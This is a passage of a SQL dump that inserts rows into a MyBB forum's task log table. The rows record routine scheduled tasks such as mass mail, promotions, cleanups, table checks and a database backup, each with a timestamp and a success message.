`dateline`, `data`) VALUES ('10685', '9', '1350423765', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10686', '5', '1350423913', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10687', '9', '1350424580', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10688', '3', '1350424742', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10689', '1', '1350424804', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10690', '7', '1350424817', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10691', '5', '1350425334', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10692', '9', '1350425438', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10693', '5', '1350426301', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10694', '9', '1350426379', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10695', '3', '1350426613', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10696', '9', '1350427212', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10697', '5', '1350427512', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10698', '9', '1350428126', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10699', '3', '1350428370', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10700', '1', '1350428422', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10701', '7', '1350428445', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10702', '5', '1350428751', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10703', '9', '1350429006', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10704', '5', '1350429925', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10705', '9', '1350429937', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10706', '3', '1350430243', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10707', '9', '1350430952', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10708', '5', '1350431514', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10709', '9', '1350431732', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10710', '3', '1350432078', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10711', '1', '1350432276', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10712', '2', '1350432321', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10713', '7', '1350432337', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10714', '11', '1350432441', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10715', '5', '1350432467', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10716', '9', '1350432639', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10717', '5', '1350433503', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10718', '9', '1350433513', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10719', '3', '1350433856', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10720', '9', '1350434422', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10721', '5', '1350434703', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10722', '9', '1350435305', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10723', '3', '1350435559', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10724', '1', '1350435608', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10725', '7', '1350435619', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10726', '5', '1350435968', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10727', '9', '1350436221', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10728', '5', '1350437104', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10729', '9', '1350437158', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10730', '3', '1350437464', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10731', '9', '1350438013', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10732', '5', '1350438342', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10733', '5', '1350438342', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10734', '9', '1350439114', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10735', '3', '1350439144', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10736', '1', '1350439214', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10737', '7', '1350439235', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10738', '5', '1350439983', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10739', '9', '1350440131', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10740', '5', '1350440702', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10741', '9', '1350440710', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10742', '3', '1350441012', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10743', '9', '1350441615', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10744', '5', '1350441932', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10745', '9', '1350442534', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10746', '3', '1350442744', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10747', '1', '1350442802', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10748', '7', '1350442820', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10749', '5', '1350443108', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10750', '9', '1350443449', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10751', '5', '1350444346', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10752', '9', '1350444383', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10753', '3', '1350444666', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10754', '9', '1350446024', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10755', '5', '1350446284', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10756', '9', '1350446309', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10757', '3', '1350446347', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10758', '1', '1350446469', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10759', '7', '1350446495', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10760', '5', '1350446748', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10761', '9', '1350447097', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10762', '5', '1350447924', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10763', '9', '1350447995', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10764', '3', '1350448203', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10765', '9', '1350448808', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10766', '5', '1350449106', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10767', '9', '1350449978', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10768', '3', '1350449984', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10769', '1', '1350450039', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10770', '7', '1350450044', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10771', '5', '1350450352', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10772', '9', '1350450653', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10773', '5', '1350451506', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10774', '9', '1350452094', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10775', '3', '1350452403', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10776', '9', '1350452982', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10777', '5', '1350453522', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10778', '9', '1350453581', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10779', '3', '1350454512', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10780', '1', '1350454561', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10781', '7', '1350454563', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10782', '5', '1350454570', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10783', '9', '1350454779', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10784', '5', '1350455353', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10785', '9', '1350455422', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10786', '3', '1350455430', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10787', '9', '1350456059', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10788', '5', '1350456326', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10789', '9', '1350456909', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10790', '3', '1350457161', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10791', '1', '1350457248', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10792', '7', '1350457251', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10793', '5', '1350458734', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10794', '9', '1350459200', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10795', '3', '1350459224', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10796', '9', '1350459665', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10797', '5', '1350459909', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10798', '9', '1350460690', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10799', '3', '1350460749', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10800', '1', '1350460864', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10801', '7', '1350460920', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10802', '5', '1350461150', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10803', '9', '1350461475', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10804', '5', '1350462311', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10805', '9', '1350462346', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10806', '3', '1350462679', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10807', '9', '1350463252', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10808', '5', '1350463533', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10809', '9', '1350464465', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10810', '3', '1350464657', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10811', '1', '1350465767', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10812', '7', '1350465937', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10813', '5', '1350466140', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10814', '9', '1350466198', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10815', '3', '1350466364', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10816', '9', '1350467242', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10817', '5', '1350468296', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10818', '9', '1350468402', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10819', '3', '1350469393', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10820', '1', '1350469405', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10821', '7', '1350469439', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10822', '5', '1350469442', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10823', '9', '1350469449', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10824', '5', '1350469602', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10825', '9', '1350469660', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10826', '3', '1350469800', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10827', '9', '1350470602', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10828', '5', '1350470705', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10829', '9', '1350471474', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10830', '3', '1350471544', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10831', '1', '1350471602', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10832', '7', '1350471645', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10833', '5', '1350471988', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10834', '9', '1350472346', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10835', '5', '1350473252', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10836', '9', '1350473978', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10837', '3', '1350473982', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10838', '9', '1350474703', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10839', '5', '1350474722', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10840', '9', '1350474906', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10841', '3', '1350475143', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10842', '1', '1350475215', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10843', '4', '1350475217', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10844', '7', '1350475223', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10845', '5', '1350475785', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10846', '9', '1350475881', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10847', '5', '1350476965', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10848', '9', '1350477435', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10849', '3', '1350477440', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10850', '9', '1350478766', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10851', '5', '1350478769', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10852', '3', '1350478816', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10853', '1', '1350478898', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10854', '7', '1350478902', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10855', '5', '1350479436', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10856', '9', '1350479726', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10857', '5', '1350480382', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10858', '9', '1350481469', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10859', '3', '1350481474', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10860', '5', '1350482298', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10861', '9', '1350482332', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10862', '3', '1350482343', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10863', '1', '1350482428', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10864', '7', '1350482458', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10865', '5', '1350482705', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10866', '9', '1350483082', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10867', '5', '1350483909', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10868', '9', '1350484392', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10869', '3', '1350484395', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10870', '9', '1350486160', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10871', '5', '1350486167', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10872', '3', '1350486228', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10873', '1', '1350486476', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10874', '7', '1350486490', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10875', '5', '1350486500', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10876', '9', '1350487246', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10877', '5', '1350487508', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10878', '9', '1350487565', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10879', '3', '1350487803', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10880', '9', '1350488477', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10881', '5', '1350488720', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10882', '9', '1350489494', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10883', '3', '1350489632', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10884', '1', '1350489635', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10885', '7', '1350489637', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10886', '5', '1350489914', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10887', '9', '1350490637', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10888', '5', '1350493191', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10889', '9', '1350493201', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10890', '3', '1350493229', 'The user cleanup task successfully ran.'); 